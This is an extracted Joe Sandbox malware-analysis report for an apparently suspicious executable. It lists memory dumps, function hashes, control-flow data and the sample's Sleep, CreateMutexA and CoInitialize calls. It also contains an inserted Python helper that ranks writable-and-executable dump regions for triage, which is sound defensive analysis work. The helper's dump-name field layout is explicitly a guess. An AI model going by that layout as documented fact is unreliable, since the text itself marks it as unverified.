                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: 58a9ed9be6e15fa18966c110ba7e251595781a4a47f6cd0f8d8b7b8f329e5163
• Instruction ID: 53954282a8aa1bb3a619a59030ead1ea17d2f924102ed6e7f3e6be1c6b2394e7
• Opcode Fuzzy Hash: 58a9ed9be6e15fa18966c110ba7e251595781a4a47f6cd0f8d8b7b8f329e5163
• Instruction Fuzzy Hash: 6A314631A241008BEF08DF78DDC9B6DB766EF81314F348619E415AB2D5CB7599E08F12

Control-flow Graph

APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: efa1ca858cdc56ca1246fa285ec683b1c9596f2933e959e07423e6c7ca24c100
• Instruction ID: ba98d2fd439046cd53641d3cef0b8e79c8bcedc6747b874d327883068d81de53
• Opcode Fuzzy Hash: efa1ca858cdc56ca1246fa285ec683b1c9596f2933e959e07423e6c7ca24c100
• Instruction Fuzzy Hash: 0D314631624201DBEF08DB78DE89B6DF7B6EF81310F288618E414A72D5C77599E08E52

Control-flow Graph

APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
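The Memory Dump Source and Associated lists in this report name every dump by a dotted identifier. The Python helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses those identifiers, decodes the protection field with the Win32 PAGE_* constants from winnt.h, and ranks the writable-and-executable regions, which are the dumps to open first when a report flags "changes PE section rights" (unpacked code lands in exactly such memory). The field layout is an assumption inferred from the identifiers on this page; only the base address (it lines up with the report's "Offset:" and function addresses) and the protection field (its values 04, 40 and 80 are exactly PAGE_READWRITE, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY) are interpreted. The sample lines are copied from this report's Memory Dump Source section.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Win32 page-protection constants (winnt.h); these values are exact.
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100

_PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
_EXECUTABLE = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
_WRITABLE = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# ASSUMED layout of a Joe Sandbox .sdmp name (the report does not document it):
#   <process idx>.<stage>.<dump id>.<base address>.<page protection>.<f6>.<f7>.<f8>.sdmp
# Only the base address and the protection field are interpreted; f6..f8 are kept opaque.
_SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp"
)


@dataclass(frozen=True)
class Sdmp:
    name: str
    process_index: int
    stage: int
    dump_id: int
    base: int
    protect: int

    @property
    def protect_name(self) -> str:
        core = _PROTECT_NAMES.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")
        return core + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def writable_and_executable(self) -> bool:
        # W+X memory is where a packer writes its next stage before jumping into it.
        return bool(self.protect & _EXECUTABLE) and bool(self.protect & _WRITABLE)


def _from_match(m: "re.Match") -> Sdmp:
    return Sdmp(name=m.group(0), process_index=int(m["proc"], 16), stage=int(m["stage"], 16),
                dump_id=int(m["dump_id"]), base=int(m["base"], 16), protect=int(m["protect"], 16))


def parse_sdmp(name: str) -> Optional[Sdmp]:
    """Parse one bare .sdmp identifier; None if it does not fit the assumed layout."""
    m = _SDMP_RE.fullmatch(name.strip())
    return _from_match(m) if m else None


def parse_report_lines(lines: Iterable[str]) -> List[Sdmp]:
    """Extract every dump identifier from 'Source File:' / 'Associated:' report lines.
    HTML extraction glues the 'Download File' link text onto the name, so the regex
    stops at '.sdmp' rather than splitting on whitespace."""
    return [_from_match(m) for line in lines for m in _SDMP_RE.finditer(line)]


def wx_regions(dumps: Iterable[Sdmp]) -> List[Sdmp]:
    """Dumps worth opening first: writable and executable, ordered by base address."""
    return sorted((d for d in dumps if d.writable_and_executable), key=lambda d: d.base)


def dump_containing(dumps: Iterable[Sdmp], address: int, process_index: int = 0) -> Optional[Sdmp]:
    """Best effort: the dump of this process with the highest base <= address.
    Region sizes are not encoded in the name, so treat the answer as a hint."""
    below = [d for d in dumps if d.process_index == process_index and d.base <= address]
    return max(below, key=lambda d: d.base) if below else None


# Sample input copied from this report's "Memory Dump Source" section.
SAMPLE_LINES = [
    "• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true",
    "• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File",
]

if __name__ == "__main__":
    dumps = parse_report_lines(SAMPLE_LINES)
    for d in wx_regions(dumps):
        print(f"{d.base:#010x}  {d.protect_name:24}  {d.name}")
    hit = dump_containing(dumps, 0x0026A963)  # address of the Sleep call in this report
    print("Sleep call lives in:", hit.name if hit else "unknown")
```

Against the six sample lines this ranks 0x261000, 0x2C2000, 0x2CB000 and 0x2D7000 as writable-and-executable and places the Sleep call at 0x26A963 in the 0x261000 PAGE_EXECUTE_READWRITE dump, consistent with the report's own "Source File" choice for that function.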
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: 870e754d0848d9f7ac33c4c5e0e4161a5967be0fd07d99ad98e8fada69e4d457
• Instruction ID: c5267253b7e07745193903cdc14d9e85b344a974437aa2035bdc395565619810
• Opcode Fuzzy Hash: 870e754d0848d9f7ac33c4c5e0e4161a5967be0fd07d99ad98e8fada69e4d457
• Instruction Fuzzy Hash: 2E216A32624201DBEB189F6CEDC9B6CB365EBC1310F204619E408D72D5CBB55DE08A12

Control-flow Graph
• Rendered graph not recoverable from extraction. Recoverable structure: the function starts at 0026A856; blocks 0026A8A9-0026A8D9 form a chain of five call 267d30 blocks that each fall through to 0026A8E4 and then into the call 2780c0 block at 0026A8EB-0026A916; block 0026A94E calls 296c6a and leads to 0026A953-0026A987, the block that issues Sleep and CreateMutexA, followed by the exit blocks 0026A98E-0026A9A8.
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: f200847dcf710c464bed358a249e60da265e1264527135b45147ff48dfe192d8
• Instruction ID: 85795526a1ac7e8968dfe6ff920d05d91a593266a3695842932be685f22133fd
• Opcode Fuzzy Hash: f200847dcf710c464bed358a249e60da265e1264527135b45147ff48dfe192d8
• Instruction Fuzzy Hash: 85216031279202D6FB145B7C9D9A72DB251EF82304F244D16E508B72D1CB7658F08D93

Control-flow Graph

control_flow_graph 1181 26a34f-26a35b 1182 26a371-26a39a call 27d663 1181->1182 1183 26a35d-26a36b 1181->1183 1189 26a39c-26a3a8 1182->1189 1190 26a3c8-26a916 call 2780c0 1182->1190 1183->1182 1184 26a93a 1183->1184 1186 26a953-26a994 Sleep CreateMutexA 1184->1186 1187 26a93a call 296c6a 1184->1187 1195 26a996-26a998 1186->1195 1196 26a9a7-26a9a8 1186->1196 1187->1186 1192 26a3be-26a3c5 call 27d663 1189->1192 1193 26a3aa-26a3b8 1189->1193 1192->1190 1193->1184 1193->1192 1195->1196 1199 26a99a-26a9a5 1195->1199 1199->1196
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: 9bae514ea390ddc2394693624f11a9e445213ab9175dc745656cd98157af37a1
• Instruction ID: cb5345ea8cbcf216aaac40710f269eb7380f1b19d67d253b2ec3dbe1b4ba5f56
• Opcode Fuzzy Hash: 9bae514ea390ddc2394693624f11a9e445213ab9175dc745656cd98157af37a1
• Instruction Fuzzy Hash: 5A216A32265201DBEB089B28ED8976CB765DB81310F248619E808A73D4C77599E08A52
APIs
• CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0026B3C8
Strings
Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
